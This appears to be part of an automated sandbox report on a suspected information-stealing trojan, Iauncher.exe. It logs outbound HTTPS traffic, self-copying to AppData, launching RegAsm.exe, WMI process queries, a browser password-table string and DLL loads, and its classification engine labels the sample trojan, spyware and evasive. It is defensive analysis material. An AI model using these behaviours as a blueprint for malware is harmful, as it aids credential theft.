                          Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
                          Source: unknownHTTPS traffic detected: 193.109.246.100:443 -> 192.168.2.7:49699 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.202.98:443 -> 192.168.2.7:49710 version: TLS 1.2
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 0_2_09BF2390 GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,0_2_09BF2390
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Temp\Tmp2498.tmpJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Temp\Tmp24A8.tmpJump to dropped file
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess Stats: CPU usage > 49%
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 0_2_05D8D8D00_2_05D8D8D0
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 0_2_05D8D8C10_2_05D8D8C1
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 0_2_05DBA5200_2_05DBA520
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 0_2_05DBAC280_2_05DBAC28
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 0_2_05DD009F0_2_05DD009F
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 0_2_075EF4780_2_075EF478
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 0_2_09BF97F00_2_09BF97F0
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 0_2_09BF97E00_2_09BF97E0
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 0_2_09CA9CFC0_2_09CA9CFC
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 0_2_09CA9C540_2_09CA9C54
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 0_2_09CA7A880_2_09CA7A88
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 0_2_09CA9DC80_2_09CA9DC8
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 0_2_09CAF1A00_2_09CAF1A0
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 0_2_09CA5BE80_2_09CA5BE8
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 0_2_09CA00400_2_09CA0040
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeCode function: 11_2_0056FBC011_2_0056FBC0
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeCode function: 11_2_0056CC4411_2_0056CC44
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeCode function: 11_2_0057BC7311_2_0057BC73
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeCode function: 11_2_00573CF311_2_00573CF3
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeCode function: 11_2_0057D4F111_2_0057D4F1
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeCode function: 11_2_0059654511_2_00596545
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeCode function: 11_2_00595DC011_2_00595DC0
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeCode function: 11_2_0057471311_2_00574713
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00BBDC7413_2_00BBDC74
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0494694813_2_04946948
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_04947C2013_2_04947C20
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0494000613_2_04940006
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0494004013_2_04940040
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_04947C1013_2_04947C10
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_05DA67D813_2_05DA67D8
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_05DAA3E813_2_05DAA3E8
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_05DA3F5013_2_05DA3F50
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_05DAA3D813_2_05DAA3D8
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_05DA6FF813_2_05DA6FF8
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_05DA6FE813_2_05DA6FE8
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeCode function: String function: 00566FC0 appears 49 times
                          Source: Iauncher.exe, 00000000.00000002.3676644672.0000000002A9B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameResourceAssembly.dllD vs Iauncher.exe
                          Source: Iauncher.exe, 00000000.00000002.3678508304.0000000003A21000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSiticone.UI.dll8 vs Iauncher.exe
                          Source: Iauncher.exe, 00000000.00000002.3682430226.0000000005560000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameResourceAssembly.dllD vs Iauncher.exe
                          Source: Iauncher.exe, 00000000.00000002.3674975399.0000000000DDD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSiticone.UI.dll8 vs Iauncher.exe
                          Source: Iauncher.exe, 00000000.00000002.3678508304.0000000003EF1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSiticone.UI.dll8 vs Iauncher.exe
                          Source: Iauncher.exe, 00000000.00000002.3674975399.0000000000D5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Iauncher.exe
                          Source: Iauncher.exe, 00000000.00000002.3683105347.0000000005C10000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSiticone.UI.dll8 vs Iauncher.exe
                          Source: Iauncher.exe, 00000000.00000002.3676644672.0000000002ACA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameResourceAssembly.dllD vs Iauncher.exe
                          Source: Iauncher.exe, 00000000.00000002.3681933748.0000000005080000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameResourceAssembly.dllD vs Iauncher.exe
                          Source: Iauncher.exe, 00000000.00000002.3676644672.0000000002A11000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSiticone.UI.dll8 vs Iauncher.exe
                          Source: Iauncher.exeBinary or memory string: OriginalFilename vs Iauncher.exe
                          Source: Iauncher.exe, 0000000B.00000002.1282336889.00000000005D3000.00000004.00000001.01000000.0000000D.sdmpBinary or memory string: OriginalFilenameMurkish.exe8 vs Iauncher.exe
                          Source: Iauncher.exeBinary or memory string: OriginalFilenameGitgo.exe" vs Iauncher.exe
                          Source: Iauncher.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                          Source: Iauncher.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: Iauncher.exe.0.drStatic PE information: Section: .bsS ZLIB complexity 0.9981044138707038
                          Source: classification engineClassification label: mal96.troj.spyw.evad.winEXE@6/7@3/4
                          Source: C:\Users\user\Desktop\Iauncher.exeFile created: C:\Users\user\AppData\Roaming\Iauncher.zipJump to behavior
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7264:120:WilError_03
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: NULL
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user~1\AppData\Local\Temp\Tmp2498.tmpJump to behavior
                          Source: Iauncher.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: Iauncher.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\Desktop\Iauncher.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002891000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.1436621457.00000000027D6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.1436621457.000000000287B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.1436621457.00000000027EC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                          Source: Iauncher.exeReversingLabs: Detection: 23%
                          Source: unknownProcess created: C:\Users\user\Desktop\Iauncher.exe "C:\Users\user\Desktop\Iauncher.exe"
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess created: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe "C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe"
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess created: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe "C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: dwrite.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: textshaping.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: windowscodecs.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: iconcodecservice.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: rasapi32.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: rasman.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: rtutils.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: dhcpcsvc6.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: dhcpcsvc.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: secur32.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: schannel.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: mskeyprotect.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: ncryptsslp.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: textinputframework.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: coreuicomponents.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwrite.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msvcp140_clr0400.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msisip.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wshext.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: appxsip.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: opcservices.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: esdsip.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sxs.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: scrrun.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: linkinfo.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: secur32.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windowscodecs.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: Window RecorderWindow detected: More than 3 window changes detected
                          Source: C:\Users\user\Desktop\Iauncher.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                          Source: Iauncher.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
